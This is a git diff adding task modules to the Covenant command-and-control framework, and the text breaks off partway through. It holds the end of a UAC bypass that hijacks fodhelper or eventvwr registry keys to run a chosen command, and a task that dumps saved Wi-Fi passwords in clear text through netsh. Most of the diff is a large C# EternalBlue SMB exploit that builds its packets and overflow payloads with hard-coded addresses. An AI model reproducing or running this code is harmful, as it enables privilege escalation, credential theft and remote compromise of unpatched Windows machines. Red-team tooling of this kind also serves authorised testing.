+ p.StartInfo.FileName = "C:\\windows\\system32\\eventvwr.exe";
+ p.Start();
+
+ Thread.Sleep(10000);
+
+ newkey.DeleteSubKeyTree("mscfile");
+ return "Eventvwr UAC bypass executed.";
+ }
+ catch (Exception e) { return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace; }
+ }
+ else
+ {
+ return "Invalid bypass selected. Select either 'fodhelper' or 'eventvwr.'";
+ }
+ }
+ }
+ TaskingType: Assembly
+ UnsafeCompile: false
+ TokenTask: false
+ Options:
+ - Name: registryKey
+ Value: ''
+ DefaultValue: 'fodhelper'
+ Description: use fodhelper or eventvwr
+ SuggestedValues:
+ - fodhelper
+ - eventvwr
+ Optional: true
+ DisplayInCommand: true
+ FileOption: false
+ - Name: command
+ Value: ''
+ DefaultValue: ''
+ Description: command to execute .
+ SuggestedValues: []
+ Optional: false
+ DisplayInCommand: true
+ FileOption: false
+ ReferenceSourceLibraries: []
+ ReferenceAssemblies:
+ - Name: System.Drawing.dll
+ Location: net40\System.Drawing.dll
+ DotNetVersion: Net40
+ - Name: System.dll
+ Location: net40\System.dll
+ DotNetVersion: Net40
+ - Name: System.Core.dll
+ Location: net40\System.Core.dll
+ DotNetVersion: Net40
+ - Name: mscorlib.dll
+ Location: net40\mscorlib.dll
+ DotNetVersion: Net40
+ - Name: System.Windows.Forms.dll
+ Location: net40\System.Windows.Forms.dll
+ DotNetVersion: Net40
+ - Name: mscorlib.dll
+ Location: net35\mscorlib.dll
+ DotNetVersion: Net35
+ - Name: System.Core.dll
+ Location: net35\System.Core.dll
+ DotNetVersion: Net35
+ - Name: System.dll
+ Location: net35\System.dll
+ DotNetVersion: Net35
+ - Name: System.Drawing.dll
+ Location: net35\System.Drawing.dll
+ DotNetVersion: Net35
+ - Name: System.Windows.Forms.dll
+ Location: net35\System.Windows.Forms.dll
+ DotNetVersion: Net35
+ EmbeddedResources: []
+
diff --git a/Covenant/Data/Tasks/Wifi_password.yaml b/Covenant/Data/Tasks/Wifi_password.yaml
new file mode 100644
index 00000000..3b1c9396
--- /dev/null
+++ b/Covenant/Data/Tasks/Wifi_password.yaml
@@ -0,0 +1,174 @@
+- Name: Wifi_passwords
+ Aliases: []
+ Description: get wifis passwords
+ Author:
+ Name: amine brahmi
+ Handle: khraoverflow
+ Link: https://twitter.com/dr_whoami_
+ Help:
+ Language: CSharp
+ CompatibleDotNetVersions:
+ - Net35
+ - Net40
+ Code: |
+ using System;
+ using System.IO;
+ using System.Text;
+ using System.Windows.Forms;
+
+ using System.Collections.Generic;
+ using System.Diagnostics;
+ using System.Globalization;
+
+ public static class Task
+ {
+ public static string Execute()
+ {
+ string output = " SSID PASSWORD";
+ output += Environment.NewLine;
+ output += "-------------------- -------------------------" + Environment.NewLine;
+ CultureInfo ci = CultureInfo.InstalledUICulture;
+
+ try
+ {
+ List wifis = new List();
+
+ var proc = new Process
+ {
+ StartInfo = new ProcessStartInfo
+ {
+ FileName = "netsh.exe",
+ Arguments = "wlan show profiles",
+ UseShellExecute = false,
+ RedirectStandardOutput = true,
+ CreateNoWindow = true
+ }
+ };
+
+
+
+
+ proc.Start();
+
+ while (!proc.StandardOutput.EndOfStream)
+ {
+ string line = proc.StandardOutput.ReadLine();
+ try
+ {
+ string separator = "";
+
+ separator = ci.Name.Contains("fr") ? "Profil Tous les utilisateurs" : "All User Profile";
+
+ if (line.Contains(separator))
+ {
+ string name = line.Substring(2 + line.IndexOf(": "), line.Length - line.IndexOf(": ") - 2);
+ if (name.Length > 1)
+ wifis.Add(name);
+ }
+
+ }
+ catch (Exception)
+ {
+
+ }
+
+ // do something with line
+ }
+
+ foreach (string wifi in wifis)
+ {
+
+ var proc2 = new Process
+ {
+ StartInfo = new ProcessStartInfo
+ {
+ FileName = "netsh.exe",
+ Arguments = string.Format(@"wlan show profiles name=""{0}"" key=clear",wifi),
+ UseShellExecute = false,
+ RedirectStandardOutput = true,
+ CreateNoWindow = true
+ }
+ };
+
+
+
+
+ proc2.Start();
+
+ while (!proc2.StandardOutput.EndOfStream)
+ {
+ string line = proc2.StandardOutput.ReadLine();
+ try
+ {
+ string separator = "";
+
+ separator = ci.Name.Contains("fr") ? "clé" : "key Content";
+
+ if (line.IndexOf(separator) != -1 )
+ {
+ string pass = line.Substring(2 + line.IndexOf(": "), line.Length - line.IndexOf(": ") - 2);
+
+ output += wifi + string.Empty.PadLeft(26-wifi.Length,' ') + pass + Environment.NewLine;
+ output += "=================================================" + Environment.NewLine;
+ }
+
+
+
+ }
+ catch (Exception)
+ {
+
+ }
+
+ // do something with line
+ }
+ }
+ return output;
+
+ }
+ catch (Exception e)
+ {
+
+ return e.Message;
+ }
+ }
+
+ }
+ TaskingType: Assembly
+ UnsafeCompile: false
+ TokenTask: false
+ Options: []
+ ReferenceSourceLibraries: []
+ ReferenceAssemblies:
+ - Name: System.Drawing.dll
+ Location: net40\System.Drawing.dll
+ DotNetVersion: Net40
+ - Name: System.dll
+ Location: net40\System.dll
+ DotNetVersion: Net40
+ - Name: System.Core.dll
+ Location: net40\System.Core.dll
+ DotNetVersion: Net40
+ - Name: mscorlib.dll
+ Location: net40\mscorlib.dll
+ DotNetVersion: Net40
+ - Name: System.Windows.Forms.dll
+ Location: net40\System.Windows.Forms.dll
+ DotNetVersion: Net40
+ - Name: mscorlib.dll
+ Location: net35\mscorlib.dll
+ DotNetVersion: Net35
+ - Name: System.Core.dll
+ Location: net35\System.Core.dll
+ DotNetVersion: Net35
+ - Name: System.dll
+ Location: net35\System.dll
+ DotNetVersion: Net35
+ - Name: System.Drawing.dll
+ Location: net35\System.Drawing.dll
+ DotNetVersion: Net35
+ - Name: System.Windows.Forms.dll
+ Location: net35\System.Windows.Forms.dll
+ DotNetVersion: Net35
+ EmbeddedResources: []
+
diff --git a/Covenant/Data/Tasks/eternalblue.yaml b/Covenant/Data/Tasks/eternalblue.yaml
new file mode 100644
index 00000000..5fee629b
--- /dev/null
+++ b/Covenant/Data/Tasks/eternalblue.yaml
@@ -0,0 +1,1171 @@
+- Name: eternalblue
+ Aliases: []
+ Description: eternalblue x64 only for now
+ Author:
+ Name: amine brahmi
+ Handle: khraoverflow
+ Link: https://twitter.com/dr_whoami_
+ Help:
+ Language: CSharp
+ CompatibleDotNetVersions:
+ - Net35
+ - Net40
+ Code: |
+ using System;
+ using System.Collections.Generic;
+ using System.Linq;
+ using System.Net;
+ using System.Net.Sockets;
+ using System.Runtime.InteropServices;
+ using System.Text;
+
+ class Task
+ {
+ public static string output="";
+
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)]
+ public struct NETBIOS_HEADER
+ {
+ public uint MessageTypeAndSize;
+ }
+
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)]
+ public struct SMB_HEADER
+ {
+ public uint protocol;
+ public byte command;
+ public byte errorClass;
+ public byte _reserved;
+ public ushort errorCode;
+ public byte flags;
+ public ushort flags2;
+ public ushort PIDHigh;
+ public ulong SecurityFeatures;
+ public ushort reserved;
+ public ushort TID;
+ public ushort PIDLow;
+ public ushort UID;
+ public ushort MID;
+ }
+
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)]
+ public struct SMB_COM_SESSION_SETUP_ANDX_RESPONSE
+ {
+ public byte WordCount;
+ public byte AndxCommand;
+ public byte reserved;
+ public ushort AndxOffset;
+ public ushort action;
+ public ushort ByteCount;
+ }
+
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)]
+ public struct SMB_COM_SESSION_SETUP_ANDX_REQUEST
+ {
+ public byte WordCount;
+ public byte AndxCommand;
+ public byte reserved1;
+ public ushort AndxOffset;
+ public ushort MaxBuffer;
+ public ushort MaxMpxCount;
+ public ushort VcNumber;
+ public uint SessionKey;
+ public ushort OEMPasswordLen;
+ public ushort UnicodePasswordLen;
+ public uint Reserved2;
+ public uint Capabilities;
+ public ushort ByteCount;
+ //SMB Data added manually
+ }
+
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)]
+ public struct SMB_COM_NEGOTIATE_REQUEST
+ {
+ public byte WordCount;
+ public ushort ByteCount;
+ //Dialects are added manually
+ }
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)]
+ public struct SMB_COM_TRANSACTION_REQUEST
+ {
+ public byte WordCount;
+ public ushort TotalParameterCount;
+ public ushort TotalDataCount;
+ public ushort MaxParameterCount;
+ public ushort MaxDataCount;
+ public byte MaxSetupCount;
+ public byte Reserved;
+ public ushort Flags;
+ public uint Timeout;
+ public ushort Reserved2;
+ public ushort ParameterCount;
+ public ushort ParameterOffset;
+ public ushort DataCount;
+ public ushort DataOffset;
+ public byte SetupCount;
+ public byte Reserved3;
+ public ushort Function;
+ public ushort FID;
+ public ushort ByteCount;
+ //TransactionName added manually
+ }
+
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)]
+ public struct SMB_COM_TREE_CONNECT_ANDX_REQUEST
+ {
+ public byte WordCount;
+ public byte AndXCommand;
+ public byte AndXReserved;
+ public ushort AndXOffset;
+ public ushort Flags;
+ public ushort PasswordLength;
+ public ushort ByteCount;
+ //SMBData added manually
+ }
+
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)]
+ public struct SMB_COM_ECHO_REQUEST
+ {
+ public byte WordCount;
+ public ushort EchoSequenceNumber;
+ public ushort ByteCount;
+ //SMBData added manually
+ }
+
+
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)]
+ public struct SMB_COM_NT_TRANSACT_REQUEST
+ {
+ public byte WordCount;
+ public byte MaxSetupCount;
+ public ushort Reserved;
+ public uint TotalParameterCount;
+ public uint TotalDataCount;
+ public uint MaxParameterCount;
+ public uint MaxDataCount;
+ public uint ParameterCount;
+ public uint ParameterOffset;
+ public uint DataCount;
+ public uint DataOffset;
+ public byte SetupCount;
+ public ushort Function;
+ public ushort Setup;
+ public ushort ByteCount;
+ //SMBData added manually
+ }
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 1)]
+ public struct SMB_COM_TRANSACTION2_SECONDARY_REQUEST
+ {
+ public byte WordCount;
+ public ushort TotalParameterCount;
+ public ushort TotalDataCount;
+ public ushort ParameterCount;
+ public ushort ParameterOffset;
+ public ushort ParameterDisplacement;
+ public ushort DataCout;
+ public ushort DataOffset;
+ public ushort DataDisplacement;
+ public ushort FID;
+ public ushort ByteCount;
+ //SMBData added manually
+ }
+
+ static public SMB_COM_NEGOTIATE_REQUEST SMB_COMNegotiateRequestFromBytes(byte[] arr)
+ {
+ SMB_COM_NEGOTIATE_REQUEST str = new SMB_COM_NEGOTIATE_REQUEST();
+ int size = Marshal.SizeOf(str);
+ IntPtr ptr = Marshal.AllocHGlobal(size);
+ Marshal.Copy(arr, 0, ptr, size);
+ str = (SMB_COM_NEGOTIATE_REQUEST)Marshal.PtrToStructure(ptr, str.GetType());
+ Marshal.FreeHGlobal(ptr);
+ return str;
+ }
+
+
+ static public byte[] SetNetBiosHeader(byte[] pkt)
+ {
+ uint size = (uint)pkt.Length;
+ byte[] intBytes = BitConverter.GetBytes(size).Reverse().ToArray();
+ NETBIOS_HEADER netbios_header = new NETBIOS_HEADER();
+ netbios_header.MessageTypeAndSize = BitConverter.ToUInt32(intBytes, 0);
+ byte[] netbios_header_packet = GetBytes(netbios_header);
+ byte[] fullMessage = netbios_header_packet.Concat(pkt).ToArray();
+ return fullMessage;
+ }
+
+ static public void SendSMBMessage(Socket sock, byte[] pkt, bool SetHeader)
+ {
+ //Calculate and set Message Length for NetBios Header
+ if (SetHeader)
+ {
+ pkt = SetNetBiosHeader(pkt);
+ }
+ try
+ {
+ sock.Send(pkt);
+ }
+ catch (Exception e)
+ {
+ output += Environment.NewLine +"Socket Error, during sending: " + e.Message;
+ }
+ }
+
+ static public byte[] ReceiveSMBMessage(Socket sock)
+ {
+ byte[] response = new byte[1024];
+ try
+ {
+ sock.Receive(response);
+ }
+ catch (Exception e)
+ {
+ output += Environment.NewLine +"Socket Error, during receive: " + e.Message;
+ }
+ return response.Skip(4).ToArray();
+ }
+
+ static public byte[] GetBytes(object str)
+ {
+ int size = Marshal.SizeOf(str);
+
+ byte[] arr = new byte[size];
+ IntPtr ptr = Marshal.AllocHGlobal(size);
+ Marshal.StructureToPtr(str, ptr, true);
+ Marshal.Copy(ptr, arr, 0, size);
+ Marshal.FreeHGlobal(ptr);
+ return arr;
+ }
+
+ static public SMB_COM_SESSION_SETUP_ANDX_RESPONSE SMB_AndxResponseFromBytes(byte[] arr)
+ {
+ SMB_COM_SESSION_SETUP_ANDX_RESPONSE str = new SMB_COM_SESSION_SETUP_ANDX_RESPONSE();
+ int size = Marshal.SizeOf(str);
+ IntPtr ptr = Marshal.AllocHGlobal(size);
+ Marshal.Copy(arr, 0, ptr, size);
+ str = (SMB_COM_SESSION_SETUP_ANDX_RESPONSE)Marshal.PtrToStructure(ptr, str.GetType());
+ Marshal.FreeHGlobal(ptr);
+ return str;
+ }
+
+ static public SMB_HEADER SMB_HeaderFromBytes(byte[] arr)
+ {
+ SMB_HEADER str = new SMB_HEADER();
+ int size = Marshal.SizeOf(str);
+ IntPtr ptr = Marshal.AllocHGlobal(size);
+ Marshal.Copy(arr, 0, ptr, size);
+ str = (SMB_HEADER)Marshal.PtrToStructure(ptr, str.GetType());
+ Marshal.FreeHGlobal(ptr);
+ return str;
+ }
+ static public bool IsValidSMB1Header(SMB_HEADER header)
+ {
+ if (header.protocol == 0x424d53ff)
+ {
+ return true;
+ }
+ return false;
+ }
+
+ static public void DetectVersionOfWindows(byte[] res)
+ {
+ SMB_HEADER header = SMB_HeaderFromBytes(res);
+ if (!IsValidSMB1Header(header))
+ {
+ output += Environment.NewLine +"Did not receive proper response when determining version... Are you sure this server is running SMB?";
+ return;
+ }
+ int sizeOfHeader = Marshal.SizeOf(header);
+ SMB_COM_SESSION_SETUP_ANDX_RESPONSE andxr = SMB_AndxResponseFromBytes(res.Skip(sizeOfHeader).ToArray());
+ int byteCount = andxr.ByteCount;
+ int sizeOfAndxr = Marshal.SizeOf(andxr);
+ byte[] data = res.Skip(sizeOfHeader + sizeOfAndxr + 1).ToArray().Take(byteCount).ToArray(); //The 1 is for Padding- This could become a problem
+ string hexString = BitConverter.ToString(data).Replace("-00-00-00-", "&"); //The SMB data is split using 3 0x00 bytes, these are changed to an '&' for easier split
+ string[] hexStringSplit = hexString.Split('&');
+
+ for (int i = 0; i < 3; i++)
+ {
+ StringBuilder strbuilder = new StringBuilder();
+ string[] charArray = hexStringSplit[i].Split('-');
+ foreach (string chars in charArray)
+ {
+ int value = Convert.ToInt32(chars, 16);
+ char charValue = (char)value;
+ if (charValue != 0)
+ {
+ strbuilder.Append(charValue);
+ }
+ }
+ if (i == 0)
+ {
+ output += Environment.NewLine +"Native OS: " + strbuilder.ToString();
+ }
+ else if (i == 1)
+ {
+ output += Environment.NewLine +"Native LAN Manager: " + strbuilder.ToString();
+ }
+ else if (i == 2)
+ {
+ output += Environment.NewLine +"Domain: " + strbuilder.ToString();
+ }
+ }
+ }
+
+ static public bool CheckVulnerability(Socket sock)
+ {
+ bool vulnerable = false;
+ SMB_HEADER header = new SMB_HEADER
+ {
+ protocol = 0x424d53ff,
+ command = 0x25,
+ errorClass = 0x00,
+ _reserved = 0x00,
+ errorCode = 0x0000,
+ flags = 0x18,
+ flags2 = 0x2801,
+ PIDHigh = 0x0000,
+ SecurityFeatures = 0x0000000000000000,
+ reserved = 0x0000,
+ TID = 0x0800,
+ PIDLow = 0x5604,
+ UID = 0x0800,
+ MID = 0x8624
+ };
+ byte[] headerBytes = GetBytes(header);
+
+ SMB_COM_TRANSACTION_REQUEST transRequest = new SMB_COM_TRANSACTION_REQUEST
+ {
+ WordCount = 0x10,
+ TotalParameterCount = 0x0000,
+ TotalDataCount = 0x0000,
+ MaxParameterCount = 0xffff,
+ MaxDataCount = 0xffff,
+ MaxSetupCount = 0x00,
+ Reserved = 0x00,
+ Flags = 0x0000,
+ Timeout = 0x00000000,
+ Reserved2 = 0x0000,
+ ParameterCount = 0x0000,
+ ParameterOffset = 0x004a,
+ DataCount = 0x0000,
+ DataOffset = 0x004a,
+ SetupCount = 0x02,
+ Reserved3 = 0x00,
+ Function = 0x0023,
+ FID = 0x0000
+ };
+ byte[] transactionName = Encoding.UTF8.GetBytes("\\PIPE\\\0");
+ transRequest.ByteCount = (ushort)transactionName.Length;
+
+ byte[] transRequestBytes = GetBytes(transRequest).Concat(transactionName).ToArray();
+ byte[] pkt = headerBytes.Concat(transRequestBytes).ToArray();
+ SendSMBMessage(sock, pkt, true);
+
+ header = SMB_HeaderFromBytes(ReceiveSMBMessage(sock));
+ if (header.errorClass == 0x05 && header._reserved == 0x02 && header.errorCode == 0xc000) //This equals STATUS_INSUFF_SERVER_RESOURCES
+ {
+ return true;
+ }
+ return vulnerable;
+ }
+
+ static public byte[] ClientNegotiate(Socket sock)
+ {
+ SMB_HEADER header = new SMB_HEADER
+ {
+ protocol = 0x424d53ff,
+ command = 0x72,
+ errorClass = 0x00,
+ _reserved = 0x00,
+ errorCode = 0x0000,
+ flags = 0x18,
+ flags2 = 0x2801,
+ PIDHigh = 0x0000,
+ SecurityFeatures = 0x0000000000000000,
+ reserved = 0x0000,
+ TID = 0x0000,
+ PIDLow = 0x4b2f,
+ UID = 0x0000,
+ MID = 0x5ec5
+ };
+ byte[] headerBytes = GetBytes(header);
+
+ SMB_COM_NEGOTIATE_REQUEST req = new SMB_COM_NEGOTIATE_REQUEST
+ {
+ WordCount = 0x00
+ };
+ List dialects = new List();
+ dialects.AddRange(Encoding.UTF8.GetBytes("\x2LANMAN1.0\0"));
+ dialects.AddRange(Encoding.UTF8.GetBytes("\x2LM1.2X002\0"));
+ dialects.AddRange(Encoding.UTF8.GetBytes("\x2NT LANMAN 1.0\0"));
+ dialects.AddRange(Encoding.UTF8.GetBytes("\x2NT LM 0.12\0"));
+ req.ByteCount = (ushort)dialects.Count;
+
+ byte[] negotitateRequest = GetBytes(req).Concat(dialects.ToArray()).ToArray();
+ string hex = BitConverter.ToString(negotitateRequest);
+ byte[] pkt = headerBytes.Concat(negotitateRequest).ToArray();
+ SendSMBMessage(sock, pkt, true);
+ return ReceiveSMBMessage(sock);
+ }
+
+ public static string ByteArrayToString(byte[] ba)
+ {
+ StringBuilder hex = new StringBuilder(ba.Length * 2);
+ foreach (byte b in ba)
+ hex.AppendFormat("{0:x2}-", b);
+ return hex.ToString();
+ }
+
+ static public byte[] SMB1AnonymousLogin(Socket sock)
+ {
+
+ SMB_HEADER header = new SMB_HEADER
+ {
+ protocol = 0x424d53ff,
+ command = 0x73,
+ errorClass = 0x00,
+ _reserved = 0x00,
+ errorCode = 0x0000,
+ flags = 0x18,
+ flags2 = 0xc007,
+ PIDHigh = 0x0000,
+ SecurityFeatures = 0x0000000000000000,
+ reserved = 0x0000,
+ TID = 0xfeff,
+ PIDLow = 0x0000,
+ UID = 0x0000,
+ MID = 0x0040
+ };
+ byte[] headerBytes = GetBytes(header);
+
+ SMB_COM_SESSION_SETUP_ANDX_REQUEST AndxRequest = new SMB_COM_SESSION_SETUP_ANDX_REQUEST
+ {
+ WordCount = 0x0d,
+ AndxCommand = 0xff,
+ reserved1 = 0x00,
+ AndxOffset = 0x0088,
+ MaxBuffer = 0x1104,
+ MaxMpxCount = 0x00a0,
+ VcNumber = 0x0000,
+ SessionKey = 0x00000000,
+ OEMPasswordLen = 0x0001,
+ UnicodePasswordLen = 0x0000,
+ Reserved2 = 0x00000000,
+ Capabilities = 0x000000d4
+ };
+ List SMBData = new List();
+ byte[] nulls = { 0x00, 0x00, 0x00, 0x00, 0x00 };
+ SMBData.AddRange(nulls);
+ SMBData.AddRange(Encoding.UTF8.GetBytes("W\0i\0n\0d\0o\0w\0s\0 \02\00\00\00\0 \02\01\09\05\0\0\0"));
+ SMBData.AddRange(Encoding.UTF8.GetBytes("W\0i\0n\0d\0o\0w\0s\0 \02\00\00\00\0 \05\0.\00\0\0\0"));
+ AndxRequest.ByteCount = (ushort)SMBData.Count;
+
+ byte[] AndxRequestBytes = GetBytes(AndxRequest).Concat(SMBData.ToArray()).ToArray();
+ byte[] pkt = headerBytes.Concat(AndxRequestBytes).ToArray();
+ SendSMBMessage(sock, pkt, true);
+ return ReceiveSMBMessage(sock);
+ }
+
+ static public byte[] TreeConnectAndXRequest(string target, Socket sock, ushort UID)
+ {
+ SMB_HEADER header = new SMB_HEADER
+ {
+ protocol = 0x424d53ff,
+ command = 0x75,
+ errorClass = 0x00,
+ _reserved = 0x00,
+ errorCode = 0x0000,
+ flags = 0x18,
+ flags2 = 0x2001,
+ PIDHigh = 0x0000,
+ SecurityFeatures = 0x0000000000000000,
+ reserved = 0x0000,
+ TID = 0xfeff,
+ PIDLow = 0x4b2f,
+ UID = UID,
+ MID = 0x5ec5
+ };
+ byte[] headerBytes = GetBytes(header);
+
+ SMB_COM_TREE_CONNECT_ANDX_REQUEST treeConnectAndxRequest = new SMB_COM_TREE_CONNECT_ANDX_REQUEST
+ {
+ WordCount = 0x04,
+ AndXCommand = 0xff,
+ AndXReserved = 0x00,
+ AndXOffset = 0x0000,
+ Flags = 0x0000,
+ PasswordLength = 0x0001,
+ };
+ byte[] PathServiceBytes = Encoding.ASCII.GetBytes(@"\\" + target + @"\IPC$" + "\0?????\0");
+ List SMBData = new List();
+ SMBData.Add(0x00); //Password
+ SMBData.AddRange(PathServiceBytes); //Path + Service
+ treeConnectAndxRequest.ByteCount = (ushort)SMBData.Count;
+
+ byte[] TreeConnectAndxRequestBytes = GetBytes(treeConnectAndxRequest).Concat(SMBData.ToArray()).ToArray();
+ byte[] pkt = headerBytes.Concat(TreeConnectAndxRequestBytes).ToArray();
+
+ SendSMBMessage(sock, pkt, true);
+ return ReceiveSMBMessage(sock);
+ }
+
+ static public byte[] MakeSMB1NTTransPacket(ushort TID, ushort UID)
+ {
+ SMB_HEADER header = new SMB_HEADER
+ {
+ protocol = 0x424d53ff,
+ command = 0xa0,
+ errorClass = 0x00,
+ _reserved = 0x00,
+ errorCode = 0x0000,
+ flags = 0x18,
+ flags2 = 0xc007,
+ PIDHigh = 0x0000,
+ SecurityFeatures = 0x0000000000000000,
+ reserved = 0x0000,
+ TID = TID,
+ PIDLow = 0xfeff,
+ UID = UID,
+ MID = 0x0040
+ };
+ byte[] headerBytes = GetBytes(header);
+
+ SMB_COM_NT_TRANSACT_REQUEST NTtransactionRequest = new SMB_COM_NT_TRANSACT_REQUEST
+ {
+ WordCount = 0x14,
+ MaxSetupCount = 0x01,
+ Reserved = 0x0000,
+ TotalParameterCount = 0x0000001e,
+ TotalDataCount = 0x000103d0,
+ MaxParameterCount = 0x0000001e,
+ MaxDataCount = 0x00000000,
+ ParameterCount = 0x0000001e,
+ ParameterOffset = 0x0000004b,
+ DataCount = 0x000003d0,
+ DataOffset = 0x00000068,
+ SetupCount = 0x01,
+ Function = 0x0000,
+ Setup = 0x0000
+ };
+ //Add SMBData
+ List SMBData = new List();
+ SMBData.AddRange(Enumerable.Repeat((byte)0x00, 31));
+ SMBData.Add(0x01);
+ SMBData.AddRange(Enumerable.Repeat((byte)0x00, 973));
+ NTtransactionRequest.ByteCount = (ushort)(SMBData.Count - 1);
+ //Merge SMBHeader with the NTTransactionRequest
+ byte[] NTtransactionRequestBytes = GetBytes(NTtransactionRequest).Concat(SMBData.ToArray()).ToArray();
+ byte[] pkt = headerBytes.Concat(NTtransactionRequestBytes).ToArray();
+ return pkt;
+ }
+
+
+ static public byte[] MakeSMB1Trans2ExploitPacket(ushort TID, ushort UID, string type, int time)
+ {
+
+ NETBIOS_HEADER NTHeader = new NETBIOS_HEADER
+ {
+ MessageTypeAndSize = 0x35100000
+ };
+
+ SMB_HEADER header = new SMB_HEADER
+ {
+ protocol = 0x424d53ff,
+ command = 0x33,
+ errorClass = 0x00,
+ _reserved = 0x00,
+ errorCode = 0x0000,
+ flags = 0x18,
+ flags2 = 0xc007,
+ PIDHigh = 0x0000,
+ SecurityFeatures = 0x0000000000000000,
+ reserved = 0x0000,
+ TID = TID,
+ PIDLow = 0xfeff,
+ UID = UID,
+ MID = 0x0040
+ };
+ byte[] headerBytes = GetBytes(NTHeader).Concat(GetBytes(header)).ToArray();
+
+ SMB_COM_TRANSACTION2_SECONDARY_REQUEST transaction2SecondaryRequest = new SMB_COM_TRANSACTION2_SECONDARY_REQUEST
+ {
+ WordCount = 0x09,
+ TotalParameterCount = 0x0102,
+ TotalDataCount = 0x1000,
+ ParameterCount = 0x0000,
+ ParameterOffset = 0x0000,
+ ParameterDisplacement = 0x0000,
+ DataCout = 0x1000,
+ DataOffset = 0x0035,
+ DataDisplacement = 0x0000, //we change this with our timeout int later
+ FID = 0x0000,
+ ByteCount = 0x1000
+ };
+ int timeout = (time * 16) + 3;
+ transaction2SecondaryRequest.DataDisplacement = BitConverter.ToUInt16(new byte[] { 0xd0, BitConverter.GetBytes(timeout)[0] }, 0);
+ //Merge SMBHeader with the transaction2SecondaryRequest
+ byte[] transaction2SecondaryRequestBytes = GetBytes(transaction2SecondaryRequest);
+ byte[] pkt = headerBytes.Concat(transaction2SecondaryRequestBytes).ToArray();
+
+ if (type.Equals("eb_trans2_exploit"))
+ {
+ List SMBData = new List();
+
+ SMBData.AddRange(Enumerable.Repeat((byte)0x00, 2957));
+ SMBData.AddRange(new List()
+ {
+ 0x80,0x00,0xa8,0x00
+ });
+ SMBData.AddRange(Enumerable.Repeat((byte)0x00, 16));
+ SMBData.AddRange(new List()
+ {
+ 0xff,0xff
+ });
+ SMBData.AddRange(Enumerable.Repeat((byte)0x00, 6));
+ SMBData.AddRange(new List()
+ {
+ 0xff,0xff
+ });
+ SMBData.AddRange(Enumerable.Repeat((byte)0x00, 22));
+ SMBData.AddRange(new List()
+ {
+ 0x00,0xf1,0xdf,0xff // x86 addresses
+ });
+ SMBData.AddRange(Enumerable.Repeat((byte)0x00, 8));
+ SMBData.AddRange(new List()
+ {
+ 0x20,0xf0,0xdf,0xff,0x00,0xf1,0xdf,0xff,0xff,0xff,0xff,0xff,0x60,0x00,0x04,0x10
+ });
+ SMBData.AddRange(Enumerable.Repeat((byte)0x00, 4));
+ SMBData.AddRange(new List()
+ {
+ 0x80,0xef,0xdf,0xff
+ });
+ SMBData.AddRange(Enumerable.Repeat((byte)0x00, 4));
+ SMBData.AddRange(new List()
+ {
+ 0x10,0x00,0xd0,0xff,0xff,0xff,0xff,0xff,0x18,0x01,0xd0,0xff,0xff,0xff,0xff,0xff
+ });
+ SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0x10));
+ SMBData.AddRange(new List()
+ {
+ 0x60,0x00,0x04,0x10
+ });
+ SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0xc));
+ SMBData.AddRange(new List()
+ {
+ 0x90,0xff,0xcf,0xff,0xff,0xff,0xff,0xff
+ });
+ SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0x8));
+ SMBData.AddRange(new List()
+ {
+ 0x80,0x10
+ });
+ SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0xe));
+ SMBData.AddRange(new List()
+ {
+ 0x39,0xbb
+ });
+ SMBData.AddRange(Enumerable.Repeat((byte)0x41, 965));
+ pkt = pkt.Concat(SMBData.ToArray()).ToArray();
+ return pkt;
+ }
+
+ if (type.Equals("eb_trans2_zero"))
+ {
+ List SMBData = new List();
+ SMBData.AddRange(Enumerable.Repeat((byte)0x00, 2055));
+ SMBData.Add(0x83);
+ SMBData.Add(0xf3);
+ SMBData.AddRange(Enumerable.Repeat((byte)0x41, 2039));
+ pkt = pkt.Concat(SMBData.ToArray()).ToArray(); //Collect it all
+ return pkt;
+ }
+ else
+ {
+ List SMBData = new List();
+ SMBData.AddRange(Enumerable.Repeat((byte)0x41, 4096));
+ pkt = pkt.Concat(SMBData.ToArray()).ToArray(); //Collect it all
+ }
+
+ return pkt;
+ }
+
+ static public byte[] MakeSMB1EchoPacket(ushort TID, ushort UID)
+ {
+ NETBIOS_HEADER NTHeader = new NETBIOS_HEADER
+ {
+ MessageTypeAndSize = 0x31000000
+ };
+
+ SMB_HEADER header = new SMB_HEADER
+ {
+ protocol = 0x424d53ff,
+ command = 0x2b,
+ errorClass = 0x00,
+ _reserved = 0x00,
+ errorCode = 0x0000,
+ flags = 0x98,
+ flags2 = 0xc007,
+ PIDHigh = 0x0000,
+ SecurityFeatures = 0x0000000000000000,
+ reserved = 0x0000,
+ TID = TID,
+ PIDLow = 0xfeff,
+ UID = UID,
+ MID = 0x0040
+ };
+ byte[] headerBytes = GetBytes(NTHeader).Concat(GetBytes(header)).ToArray();
+
+ SMB_COM_ECHO_REQUEST echoRequest = new SMB_COM_ECHO_REQUEST
+ {
+ WordCount = 0x1,
+ EchoSequenceNumber = 0x0001,
+ };
+
+ //Add SMBData
+ List SMBData = new List();
+ SMBData.AddRange(Enumerable.Repeat((byte)0x41, 11));
+ SMBData.Add(0x00);
+ echoRequest.ByteCount = (ushort)(SMBData.Count);
+ //Merge SMBHeader with the echoRequest
+ byte[] echoRequestBytes = GetBytes(echoRequest).Concat(SMBData.ToArray()).ToArray();
+ byte[] pkt = headerBytes.Concat(echoRequestBytes).ToArray();
+ return pkt;
+ }
+
+ static public byte[] SMB1LargeBuffer(SMB_HEADER header, Socket sock)
+ {
+ //Send and Recveive NT Trans packet
+ byte[] nt_trans_pkt = MakeSMB1NTTransPacket(header.TID, header.UID);
+ SendSMBMessage(sock, nt_trans_pkt, true);
+ ReceiveSMBMessage(sock);
+
